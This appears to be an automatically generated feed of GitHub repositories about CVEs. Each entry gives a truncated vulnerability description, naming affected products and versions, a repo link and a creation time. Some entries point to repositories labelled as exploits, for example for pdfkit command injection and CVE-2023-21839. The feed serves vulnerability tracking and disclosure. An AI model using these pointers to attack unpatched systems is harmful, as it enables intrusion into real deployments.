**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 150 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1826](https://github.com/Live-Hack-CVE/CVE-2018-1826) create time: 2023-01-30T19:42:31Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 148 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1760](https://github.com/Live-Hack-CVE/CVE-2018-1760) create time: 2023-01-30T19:42:27Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 discloses sensitive information in error messages that may be used by a malicious user to orchestrate further attacks. IBM X-Force ID: 147838. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1734](https://github.com/Live-Hack-CVE/CVE-2018-1734) create time: 2023-01-30T19:42:24Z

**IBM Rational Collaborative Lifecycle Management 6.0 through 6.0.6.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 148 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1758](https://github.com/Live-Hack-CVE/CVE-2018-1758) create time: 2023-01-30T19:42:20Z

**IBM API Connect 2018.1 through 2018.4.1.5 could disclose sensitive information to an unauthorized user that could aid in further attacks against the system. IBM X-Force ID: 155193. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2013](https://github.com/Live-Hack-CVE/CVE-2018-2013) create time: 2023-01-30T19:42:05Z

**IBM API Connect 2018.1 through 2018.4.1.5 could allow an attacker to obtain sensitive information from a specially crafted HTTP request that could aid an attacker in further attacks against the system. IBM X-Force ID: 155150. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2011](https://github.com/Live-Hack-CVE/CVE-2018-2011) create time: 2023-01-30T19:41:56Z

**A stored cross site scripting vulnerability in Jenkins Dependency Graph Viewer Plugin 0.13 and earlier allowed attackers able to configure jobs in Jenkins to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10349](https://github.com/Live-Hack-CVE/CVE-2019-10349) create time: 2023-01-30T19:43:14Z

**A reflected cross site scripting vulnerability in Jenkins Embeddable Build Status Plugin 2.0.1 and earlier allowed attackers inject arbitrary HTML and JavaScript into the response of this plugin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10346](https://github.com/Live-Hack-CVE/CVE-2019-10346) create time: 2023-01-30T19:43:10Z

**A cross-site request forgery vulnerability in Jenkins Docker Plugin 1.1.6 and earlier in DockerAPI.DescriptorImpl#doTestConnection allowed users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenk CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-10340](https://github.com/Live-Hack-CVE/CVE-2019-10340) create time: 2023-01-30T19:43:06Z

**SQL injection vulnerability in synophoto_csPhotoDB.php in Synology Photo Station before 6.8.11-3489 and before 6.3-2977 allows remote attackers to execute arbitrary SQL command via the type parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11821](https://github.com/Live-Hack-CVE/CVE-2019-11821) create time: 2023-01-30T19:43:03Z

**XSS exists in Ping Identity Agentless Integration Kit before 1.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13564](https://github.com/Live-Hack-CVE/CVE-2019-13564) create time: 2023-01-30T19:42:59Z

**Relative path traversal vulnerability in SYNO.PhotoStation.File in Synology Photo Station before 6.8.11-3489 and before 6.3-2977 allows remote attackers to upload arbitrary files via the uploadphoto parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11822](https://github.com/Live-Hack-CVE/CVE-2019-11822) create time: 2023-01-30T19:42:51Z

**IBM Sterling B2B Integrator 6.0.0.0 and 6.0.0.1 reveals sensitive information from a stack trace that could be used in further attacks against the system. IBM X-Force ID: 162803. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4377](https://github.com/Live-Hack-CVE/CVE-2019-4377) create time: 2023-01-30T19:42:16Z

**IBM API Connect 5.0.0.0 through 5.0.8.6 could allow an unauthorized user to obtain sensitive information about the system users using specially crafted HTTP requests. IBM X-Force ID: 162162. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4382](https://github.com/Live-Hack-CVE/CVE-2019-4382) create time: 2023-01-30T19:42:12Z

**Stored XSS in the Filters page (Name field) in ZoneMinder 1.32.3 allows a malicious user to embed and execute JavaScript code in the browser of any user who navigates to this page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13072](https://github.com/Live-Hack-CVE/CVE-2019-13072) create time: 2023-01-30T19:42:08Z

**The Spotfire library component of TIBCO Software Inc.'s TIBCO Spotfire Analytics Platform for AWS Marketplace, and TIBCO Spotfire Server contains vulnerabilities that theoretically allow a malicious user to undermine the integrity of comments and bookmarks. Affected releases are TIBCO Software Inc.'s TIBCO Spotfire Ana CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-11206](https://github.com/Live-Hack-CVE/CVE-2019-11206) create time: 2023-01-30T19:42:00Z

**An issue was discovered in FC46-WebBridge on GE Grid Solutions MS3000 devices before 3.7.6.25p0_3.2.2.17p0_4.7p0. A vulnerability in the web server allows arbitrary files and configurations to be read via directory traversal over TCP port 8888. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43975](https://github.com/Live-Hack-CVE/CVE-2022-43975) create time: 2023-01-30T19:42:55Z

**IBM Marketing Platform 9.1.0, 9.1.2, 10.0, and 10.1 exposes sensitive information in the headers that could be used by an authenticated attacker in further attacks against the system. IBM X-Force ID: 120906. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-1107](https://github.com/Live-Hack-CVE/CVE-2017-1107) create time: 2023-01-30T17:30:41Z

**stattic node module suffers from a Path Traversal vulnerability due to lack of validation of path, which allows a malicious user to read content of any file with known path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3734](https://github.com/Live-Hack-CVE/CVE-2018-3734) create time: 2023-01-30T17:31:10Z

**glance node module before 3.0.4 suffers from a Path Traversal vulnerability due to lack of validation of path passed to it, which allows a malicious user to read content of any file with known path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3715](https://github.com/Live-Hack-CVE/CVE-2018-3715) create time: 2023-01-30T17:31:06Z

**The pdfinfojs NPM module versions <= 0.3.6 has a command injection vulnerability that allows an attacker to execute arbitrary commands on the victim's machine. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3746](https://github.com/Live-Hack-CVE/CVE-2018-3746) create time: 2023-01-30T17:31:01Z

**Open redirect in hekto <=0.2.3 when target domain name is used as html filename on server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3743](https://github.com/Live-Hack-CVE/CVE-2018-3743) create time: 2023-01-30T17:30:58Z

**mcstatic node module suffers from a Path Traversal vulnerability due to lack of validation of filePath, which allows a malicious user to read content of any file with known path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3730](https://github.com/Live-Hack-CVE/CVE-2018-3730) create time: 2023-01-30T17:30:54Z

**The html-pages node module contains a path traversal vulnerabilities that allows an attacker to read any file from the server with cURL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3744](https://github.com/Live-Hack-CVE/CVE-2018-3744) create time: 2023-01-30T17:30:50Z

**public node module suffers from a Path Traversal vulnerability due to lack of validation of filePath, which allows a malicious user to read content of any file with known path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3731](https://github.com/Live-Hack-CVE/CVE-2018-3731) create time: 2023-01-30T17:30:26Z

**hekto node module suffers from a Path Traversal vulnerability due to lack of validation of file, which allows a malicious user to read content of any file with known path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3725](https://github.com/Live-Hack-CVE/CVE-2018-3725) create time: 2023-01-30T17:30:22Z

**An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to h2 SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20469](https://github.com/Live-Hack-CVE/CVE-2018-20469) create time: 2023-01-30T17:30:18Z

**IBM InfoSphere Information Server 11.3, 11.5, and 11.7 is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 150905. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1845](https://github.com/Live-Hack-CVE/CVE-2018-1845) create time: 2023-01-30T17:30:14Z

**An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-20470](https://github.com/Live-Hack-CVE/CVE-2018-20470) create time: 2023-01-30T17:30:11Z

**A privilege escalation vulnerability exists in SolarWinds Serv-U before 15.1.7 for Linux. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-12181](https://github.com/Live-Hack-CVE/CVE-2019-12181) create time: 2023-01-30T17:30:45Z

**IBM Maximo Asset Management 7.6 is vulnerable to CSV injection, which could allow a remote authenticated attacker to execute arbirary commands on the system. IBM X-Force ID: 161680. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4364](https://github.com/Live-Hack-CVE/CVE-2019-4364) create time: 2023-01-30T17:30:38Z

**IBM Spectrum Protect Plus 10.1.2 may display the vSnap CIFS password in the IBM Spectrum Protect Plus Joblog. This can result in an attacker gaining access to sensitive information as well as vSnap. IBM X-Force ID: 162173. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4385](https://github.com/Live-Hack-CVE/CVE-2019-4385) create time: 2023-01-30T17:30:33Z

**IBM Campaign 9.1.2 and 10.1 could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 162172. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-4384](https://github.com/Live-Hack-CVE/CVE-2019-4384) create time: 2023-01-30T17:30:30Z

**no description** : [choda225/CvecaraAplikacija2021271025](https://github.com/choda225/CvecaraAplikacija2021271025) create time: 2023-01-30T17:38:18Z

**An issue was discovered in EasyVista 2020.2.125.3 and 2022.1.109.0.03. Some parameters allow SQL injection. Version 2022.1.110.1.02 corrects this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38490](https://github.com/Live-Hack-CVE/CVE-2022-38490) create time: 2023-01-30T17:31:22Z

**An open redirect vulnerability exists in Okta OIDC Middleware prior to version 5.0.0 allowing an attacker to redirect a user to an arbitrary URL. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3145](https://github.com/Live-Hack-CVE/CVE-2022-3145) create time: 2023-01-30T17:31:17Z

**A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that could cause arbitrary code execution, denial of service and loss of confidentiality & integrity when a malicious project file is loaded onto the controller. Affected Products: EcoStruxure™ Control Expert (All Versions), EcoStruxur CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45788](https://github.com/Live-Hack-CVE/CVE-2022-45788) create time: 2023-01-30T15:19:58Z

**A use after free vulnerability exists in the ALSA PCM package in the Linux Kernel. SNDRV_CTL_IOCTL_ELEM_{READ|WRITE}32 is missing locks that can be used in a use-after-free that can result in a priviledge escalation to gain ring0 access from the system user. We recommend upgrading past commit 56b88b50565cd8b946a2d00b0c CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0266](https://github.com/Live-Hack-CVE/CVE-2023-0266) create time: 2023-01-30T15:20:07Z

**There is a logic error in io_uring's implementation which can be used to trigger a use-after-free vulnerability leading to privilege escalation. In the io_prep_async_work function the assumption that the last io_grab_identity call cannot return false is not true, and in this case the function will use the init_cred or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0240](https://github.com/Live-Hack-CVE/CVE-2023-0240) create time: 2023-01-30T15:20:03Z

**A vulnerability in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to execute arbitrary code or cause the web-based management process on the device to restart unexpectedly, resulting in a denial of se CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-20007](https://github.com/Live-Hack-CVE/CVE-2023-20007) create time: 2023-01-30T15:19:54Z

**An OS command injection vulnerability exists in the httpd logs/view.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42484](https://github.com/Live-Hack-CVE/CVE-2022-42484) create time: 2023-01-30T14:14:50Z

**A directory traversal vulnerability exists in the httpd update.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38451](https://github.com/Live-Hack-CVE/CVE-2022-38451) create time: 2023-01-30T14:14:46Z

**A CWE-787: Out-of-bounds Write vulnerability exists that could cause sensitive information leakage when accessing a malicious web page from the commissioning software. Affected Products: SoMachine HVAC(V2.1.0 and prior), EcoStruxure Machine Expert – HVAC(V1.4.0 and prior). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2988](https://github.com/Live-Hack-CVE/CVE-2022-2988) create time: 2023-01-30T14:14:41Z

**Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46359](https://github.com/Live-Hack-CVE/CVE-2022-46359) create time: 2023-01-30T12:03:45Z

**Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46358](https://github.com/Live-Hack-CVE/CVE-2022-46358) create time: 2023-01-30T12:03:42Z

**Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46357](https://github.com/Live-Hack-CVE/CVE-2022-46357) create time: 2023-01-30T12:03:37Z

**Potential vulnerabilities have been identified in HP Security Manager which may allow escalation of privilege, arbitrary code execution, and information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46356](https://github.com/Live-Hack-CVE/CVE-2022-46356) create time: 2023-01-30T12:03:34Z

**Information disclosure vulnerability exists in Pgpool-II 4.4.0 to 4.4.1 (4.4 series), 4.3.0 to 4.3.4 (4.3 series), 4.2.0 to 4.2.11 (4.2 series), 4.1.0 to 4.1.14 (4.1 series), 4.0.0 to 4.0.21 (4.0 series), All versions of 3.7 series, All versions of 3.6 series, All versions of 3.5 series, All versions of 3.4 series, and CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22332](https://github.com/Live-Hack-CVE/CVE-2023-22332) create time: 2023-01-30T12:04:00Z

**Improper restriction of XML external entity reference (XXE) vulnerability exists in OMRON CX-Motion Pro 1.4.6.013 and earlier. If a user opens a specially crafted project file created by an attacker, sensitive information in the file system where CX-Motion Pro is installed may be disclosed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22322](https://github.com/Live-Hack-CVE/CVE-2023-22322) create time: 2023-01-30T12:03:57Z

**Cross-site scripting vulnerability in EasyMail 2.00.130 and earlier allows a remote unauthenticated attacker to inject an arbitrary script. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22333](https://github.com/Live-Hack-CVE/CVE-2023-22333) create time: 2023-01-30T12:03:53Z

**SQL injection vulnerability in the CONPROSYS HMI System (CHS) Ver.3.5.0 and earlier allows a remote authenticated attacker to execute an arbitrary SQL command. As a result, information stored in the database may be obtained. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22324](https://github.com/Live-Hack-CVE/CVE-2023-22324) create time: 2023-01-30T12:03:49Z

**Use after free in GuestView in Google Chrome prior to 109.0.5414.119 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a Chrome web app. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0474](https://github.com/Live-Hack-CVE/CVE-2023-0474) create time: 2023-01-30T12:03:30Z

**Type Confusion in ServiceWorker API in Google Chrome prior to 109.0.5414.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0473](https://github.com/Live-Hack-CVE/CVE-2023-0473) create time: 2023-01-30T12:03:26Z

**Use after free in WebRTC in Google Chrome prior to 109.0.5414.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0472](https://github.com/Live-Hack-CVE/CVE-2023-0472) create time: 2023-01-30T12:03:23Z

**Use after free in WebTransport in Google Chrome prior to 109.0.5414.119 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0471](https://github.com/Live-Hack-CVE/CVE-2023-0471) create time: 2023-01-30T12:03:19Z

**mirror of https://w1.fi/cgit/hostap/ till 30/01/2023 for CVE-2022-23303/4 - Bug 114981 CGX2.2** : [skulkarni-mv/hostapd_mirror](https://github.com/skulkarni-mv/hostapd_mirror) create time: 2023-01-30T07:22:34Z

**A vulnerability has been reported to affect QNAP device running QuTS hero, QTS. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of QuTS hero, QTS: QuTS hero h5.0.1.2248 build 20221215 and later QTS 5.0.1.2234 build 202 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27596](https://github.com/Live-Hack-CVE/CVE-2022-27596) create time: 2023-01-30T06:39:18Z

**GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48303](https://github.com/Live-Hack-CVE/CVE-2022-48303) create time: 2023-01-30T06:39:05Z

**Versions of the package eta before 2.0.0 are vulnerable to Remote Code Execution (RCE) by overwriting template engine configuration variables with view options received from The Express render API. **Note:** This is exploitable only for users who are rendering templates with user-defined data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25967](https://github.com/Live-Hack-CVE/CVE-2022-25967) create time: 2023-01-30T06:38:54Z

**Versions of the package servst before 2.0.3 are vulnerable to Directory Traversal due to improper sanitization of the filePath variable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25936](https://github.com/Live-Hack-CVE/CVE-2022-25936) create time: 2023-01-30T06:38:51Z

**The PdfBook extension through 2.0.5 before b07b6a64 for MediaWiki allows command injection via an option. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24612](https://github.com/Live-Hack-CVE/CVE-2023-24612) create time: 2023-01-30T06:39:09Z

**Paranoidhttp before 0.3.0 allows SSRF because [::] is equivalent to the 127.0.0.1 address, but does not match the filter for private addresses. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24623](https://github.com/Live-Hack-CVE/CVE-2023-24623) create time: 2023-01-30T06:39:01Z

**isInList in the safeurl-python package before 1.2 for Python has an insufficiently restrictive regular expression for external domains, leading to SSRF. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24622](https://github.com/Live-Hack-CVE/CVE-2023-24622) create time: 2023-01-30T06:38:57Z

**CVE-2022-47717** : [l00neyhacker/CVE-2022-47717](https://github.com/l00neyhacker/CVE-2022-47717) create time: 2023-01-30T04:09:36Z

**no description** : [l00neyhacker/CVE-2022-47715](https://github.com/l00neyhacker/CVE-2022-47715) create time: 2023-01-30T04:02:12Z

**CVE-2022-47714** : [l00neyhacker/CVE-2022-47714](https://github.com/l00neyhacker/CVE-2022-47714) create time: 2023-01-30T03:59:02Z

**CVE-2023-23132** : [l00neyhacker/CVE-2023-23132](https://github.com/l00neyhacker/CVE-2023-23132) create time: 2023-01-30T04:17:44Z

**CVE-2023-23131** : [l00neyhacker/CVE-2023-23131](https://github.com/l00neyhacker/CVE-2023-23131) create time: 2023-01-30T04:16:08Z

**CVE-2023-23130** : [l00neyhacker/CVE-2023-23130](https://github.com/l00neyhacker/CVE-2023-23130) create time: 2023-01-30T04:15:19Z

**CVE-2023-23128** : [l00neyhacker/CVE-2023-23128](https://github.com/l00neyhacker/CVE-2023-23128) create time: 2023-01-30T04:13:36Z

**CVE-2023-23127** : [l00neyhacker/CVE-2023-23127](https://github.com/l00neyhacker/CVE-2023-23127) create time: 2023-01-30T04:12:17Z

**CVE-2023-23126** : [l00neyhacker/CVE-2023-23126](https://github.com/l00neyhacker/CVE-2023-23126) create time: 2023-01-30T04:11:14Z

**WireGuard, such as WireGuard 0.5.3 on Windows, does not fully account for the possibility that an adversary might be able to set a victim's system time to a future value, e.g., because unauthenticated NTP is used. This can lead to an outcome in which one static private key becomes permanently useless. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46873](https://github.com/Live-Hack-CVE/CVE-2021-46873) create time: 2023-01-30T02:16:03Z

**Unchecked Error Condition in GitHub repository froxlor/froxlor prior to 2.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0572](https://github.com/Live-Hack-CVE/CVE-2023-0572) create time: 2023-01-30T02:16:07Z

**NOSH 4a5cfdb allows stored XSS via the create user page. For example, a first name (of a physician, assistant, or billing user) can have a JavaScript payload that is executed upon visiting the /users/2/1 page. This may allow attackers to steal Protected Health Information because the product is for health charting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24065](https://github.com/Live-Hack-CVE/CVE-2023-24065) create time: 2023-01-30T00:04:38Z

**Static Code Injection in GitHub repository froxlor/froxlor prior to 2.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0566](https://github.com/Live-Hack-CVE/CVE-2023-0566) create time: 2023-01-30T00:04:35Z

**Business Logic Errors in GitHub repository froxlor/froxlor prior to 2.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0565](https://github.com/Live-Hack-CVE/CVE-2023-0565) create time: 2023-01-30T00:04:32Z

**A vulnerability was found in capnsquarepants wordcraft up to 0.6. It has been classified as problematic. Affected is an unknown function of the file tag.php. The manipulation of the argument tag leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 0.7 is able to address this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2009-10003](https://github.com/Live-Hack-CVE/CVE-2009-10003) create time: 2023-01-29T21:52:50Z

**A vulnerability was found in mosbth cimage up to 0.7.18. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file check_system.php. The manipulation of the argument $_SERVER['SERVER_SOFTWARE'] leads to cross site scripting. The attack can be launched remotely. Upgradin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15022](https://github.com/Live-Hack-CVE/CVE-2016-15022) create time: 2023-01-29T21:52:53Z

**This affects the package object-path before 0.11.6. A type confusion vulnerability can lead to a bypass of CVE-2020-15256 when the path components used in the path parameter are arrays. In particular, the condition currentPath === '__proto__' returns false if currentPath is ['__proto__']. This is because the === operat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23434](https://github.com/Live-Hack-CVE/CVE-2021-23434) create time: 2023-01-29T19:44:26Z

**object-path is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3805](https://github.com/Live-Hack-CVE/CVE-2021-3805) create time: 2023-01-29T19:44:23Z

**Weak Password Requirements in GitHub repository publify/publify prior to 9.2.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0569](https://github.com/Live-Hack-CVE/CVE-2023-0569) create time: 2023-01-29T19:44:30Z

**A vulnerability has been found in SourceCodester Canteen Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file createcustomer.php of the component Add Customer. The manipulation of the argument name leads to cross site scripting. The attack can be initiated remotely. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0571](https://github.com/Live-Hack-CVE/CVE-2023-0571) create time: 2023-01-29T19:44:20Z

**A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file user\operations\payment_operation.php. The manipulation of the argument booking_id leads to sql injection. It is possible to initiate the attack remotely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0570](https://github.com/Live-Hack-CVE/CVE-2023-0570) create time: 2023-01-29T19:44:16Z

**Joomla JCK Editor 6.4.4 - 'parent' SQL Injection** : [MataKucing-OFC/CVE-2018-17254](https://github.com/MataKucing-OFC/CVE-2018-17254) create time: 2023-01-29T17:07:10Z

**In Dijit before versions 1.11.11, and greater than or equal to 1.12.0 and less than 1.12.9, and greater than or equal to 1.13.0 and less than 1.13.8, and greater than or equal to 1.14.0 and less than 1.14.7, and greater than or equal to 1.15.0 and less than 1.15.4, and greater than or equal to 1.16.0 and less than 1.16 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4051](https://github.com/Live-Hack-CVE/CVE-2020-4051) create time: 2023-01-29T15:20:27Z

**All versions of package dojo are vulnerable to Prototype Pollution via the setObject function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23450](https://github.com/Live-Hack-CVE/CVE-2021-23450) create time: 2023-01-29T15:20:24Z

**Contains a simple yara rule to hunt for possible compromised KeePass config files** : [Cyb3rtus/keepass_CVE-2023-24055_yara_rule](https://github.com/Cyb3rtus/keepass_CVE-2023-24055_yara_rule) create time: 2023-01-29T14:13:44Z

**Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6** : [nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765](https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765) create time: 2023-01-29T10:36:40Z

**loadAsync in JSZip before 3.8.0 allows Directory Traversal via a crafted ZIP archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48285](https://github.com/Live-Hack-CVE/CVE-2022-48285) create time: 2023-01-29T06:37:06Z

**Weak Password Requirements in GitHub repository froxlor/froxlor prior to 2.0.10. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0564](https://github.com/Live-Hack-CVE/CVE-2023-0564) create time: 2023-01-29T06:37:11Z

**This is a vulnerability in the Linux kernel that was discovered and disclosed in 2017.** : [SeasonLeague/CVE-2017-5487](https://github.com/SeasonLeague/CVE-2017-5487) create time: 2023-01-29T04:43:37Z

**windows 10 SMB vulnerability** : [krizzz07/CVE-2020-0796](https://github.com/krizzz07/CVE-2020-0796) create time: 2023-01-29T04:29:49Z

**CVE-2023-21839 exp** : [fakenews2025/CVE-2023-21839](https://github.com/fakenews2025/CVE-2023-21839) create time: 2023-01-29T03:02:10Z

**A vulnerability has been found in NYUCCL psiTurk up to 3.2.0 and classified as critical. This vulnerability affects unknown code of the file psiturk/experiment.py. The manipulation of the argument mode leads to improper neutralization of special elements used in a template engine. The exploit has been disclosed to the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4315](https://github.com/Live-Hack-CVE/CVE-2021-4315) create time: 2023-01-29T02:18:05Z

**A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. Th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0563](https://github.com/Live-Hack-CVE/CVE-2023-0563) create time: 2023-01-29T02:18:12Z

**A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The identifi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0562](https://github.com/Live-Hack-CVE/CVE-2023-0562) create time: 2023-01-29T02:18:09Z

**In LemonLDAP::NG (aka lemonldap-ng) through 2.0.8, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-16093](https://github.com/Live-Hack-CVE/CVE-2020-16093) create time: 2023-01-28T19:42:48Z

**A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. Affected is an unknown function of the file /user/s.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0561](https://github.com/Live-Hack-CVE/CVE-2023-0561) create time: 2023-01-28T19:42:55Z

